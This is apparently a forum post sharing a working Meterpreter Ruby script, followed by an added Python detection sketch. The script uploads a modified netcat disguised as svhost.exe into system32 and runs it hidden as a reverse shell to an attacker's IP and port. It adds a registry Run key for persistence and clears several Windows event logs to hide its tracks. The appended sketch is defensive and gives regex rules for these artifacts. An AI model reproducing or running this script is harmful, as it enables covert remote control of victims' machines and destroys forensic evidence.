Gonzalez

sbd.rb


sbd.rb uploads sbd.exe, which runs as svchost.exe with the settings that are entered by the attacker.

It autoruns via the registry and autostarts as the script is run, then clears system logs. Remember, it is a modded netcat for a reverse shell. It needs some more edits to the script to hide the reg a little better, but this will do till update time.

session = client
host,port = session.tunnel_peer.split(':')
#Menu-Options
@@exec_opts = Rex::Parser::Arguments.new(
"-r" => [ true, "Resporn time limit." ],
"-p" => [ true, "Port Number to open." ],
"-k" => [ true, "Authentication name."],
"-h" => [ true, "Local ip address."]
)
def usage
print_line("Sbd Configuration Meterpreter Script by Intern0t.net")
print_line(" Michael Johnson (Zero Cold) mjog123@hotmail.com ")
print_line("####################################################")
print(@@exec_opts.usage)
raise Rex::Script::Completed
end

#Files to upload to target host
ncexe = File.join(Msf::Config.install_root, "data", "sbd.exe")
#Function to upload files
def upload(session,file)
location = session.fs.file.expand_path("%SystemRoot%\\system32")
fileontrgt = "#{location}\\#{"svhost"}.exe"
print_status("Uploading #{file}....")
session.fs.file.upload_file("#{fileontrgt}","#{file}")
print_status("#{file} Uploaded!")
return fileontrgt
end

#Function to execute sbd
def sbdrun(session,time,auth,port,ip)
location = session.fs.file.expand_path("%SystemRoot%\\system32")
session.sys.process.execute("cmd /c #{location}\\svhost.exe -q -r #{time} -k #{auth} -e cmd.exe -D on -p #{port} #{ip}", nil, {'Hidden' => true, 'Channelized' => false})
print_status("Local Ip Sbd Will Connect Back On: #{ip}")
print_status("Local Port Sbd Will Connect Back On: #{port}")
print_status("Pass Phrase: #{auth}")
print_status("Respawn Time: #{time}")
end
#Function to add registry for sbd
def regadd(session,time,auth,port,ip)
location = session.fs.file.expand_path("%SystemRoot%\\system32")
print_status("Adding to Registry ...")
session.sys.process.execute("cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /f /v Microsoft /d \"#{location}\\svhost.exe\ -q -r #{time} -k #{auth} -e cmd -D on -p #{port} #{ip}\"", nil, {'Hidden' => true, 'Channelized' => false})
print_status("Successfully added to Registry ...")
end
def clrevtlgs(session)
evtlogs = [
'security',
'system',
'application',
'directory service',
'dns server',
'file replication service'
]

begin
evtlogs.each do |evl|
log = session.sys.eventlog.open(evl)
log.clear
end
rescue ::Exception => e
print_status("Error clearing Event Log: #{e.class} #{e}")

end
end

#Menu-Input
time = nil
port = nil
ip = nil
auth = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-r"
time = val
when "-p"
port = val
when "-h"
ip = val
when "-k"
auth = val
end

}
if port

upload(session,ncexe)
sbdrun(session,time,auth,port,ip)
regadd(session,time,auth,port,ip)
clrevtlgs(session)
else
usage
end

Video:

http://www.youtube.com/watch?v=imFAm3AxOuc
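
Detection sketch for the artifacts the script above leaves behind, as an added example that is not part of the original post: a svhost.exe binary in system32, a Run value named "Microsoft" pointing at it, the `-e cmd ... -p <port>` command line, and cleared event logs. The event records are constructed and use simplified Sysmon-style fields (IDs 1, 11, 13) plus the Windows log-cleared IDs 1102 and 104; the field names, rule names and the `classify`/`detect` helpers are assumptions of this example.

```python
import re

# Constructed sample telemetry, normalised to one dict per event (not real logs).
SAMPLE_EVENTS = [
    {"id": 11, "TargetFilename": r"C:\Windows\System32\svhost.exe"},
    {"id": 1, "Image": r"C:\Windows\System32\svhost.exe",
     "CommandLine": r"C:\Windows\system32\svhost.exe -q -r 10 -k pass -e cmd.exe -D on -p 4444 192.0.2.10"},
    {"id": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft",
     "Details": r"C:\Windows\system32\svhost.exe -q -r 10 -k pass -e cmd -D on -p 4444 192.0.2.10"},
    {"id": 1102, "Channel": "Security"},   # audit log cleared
    {"id": 104, "Channel": "System"},      # event log cleared
    {"id": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},  # legitimate
]

# "svhost.exe" (no 'c') in system32 imitates the real svchost.exe.
FAKE_SVCHOST = re.compile(r"\\system32\\svhost\.exe", re.I)
# Shell bound to a port: "-e cmd" or "-e cmd.exe" followed later by "-p <digits>".
SBD_ARGS = re.compile(r"-e\s+cmd(\.exe)?\b.*-p\s+\d+", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)
LOG_CLEARED_IDS = {1102, 104}

def classify(ev):
    """Return the set of rule names a single event matches."""
    hits = set()
    eid = ev.get("id")
    path = ev.get("Image") or ev.get("TargetFilename") or ""
    if eid in (1, 11) and FAKE_SVCHOST.search(path):
        hits.add("masquerade_svhost")
    if eid == 1 and SBD_ARGS.search(ev.get("CommandLine", "")):
        hits.add("sbd_cmdline")
    if eid == 13 and RUN_KEY.search(ev.get("TargetObject", "")):
        data = ev.get("Details", "")
        if FAKE_SVCHOST.search(data) or SBD_ARGS.search(data):
            hits.add("run_key_persistence")
    if eid in LOG_CLEARED_IDS:
        hits.add("log_cleared")
    return hits

def detect(events):
    """Return (findings, chain): per-event hits and whether implant and log wipe co-occur."""
    findings = [(i, r) for i, ev in enumerate(events) for r in sorted(classify(ev))]
    rules = {r for _, r in findings}
    chain = "log_cleared" in rules and bool(
        rules & {"masquerade_svhost", "run_key_persistence"})
    return findings, chain
```

Because the script clears the local logs as its last step, these rules only help if the events are forwarded off the host before the wipe; the 1102/104 records themselves are written after the clear and remain a reliable signal.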
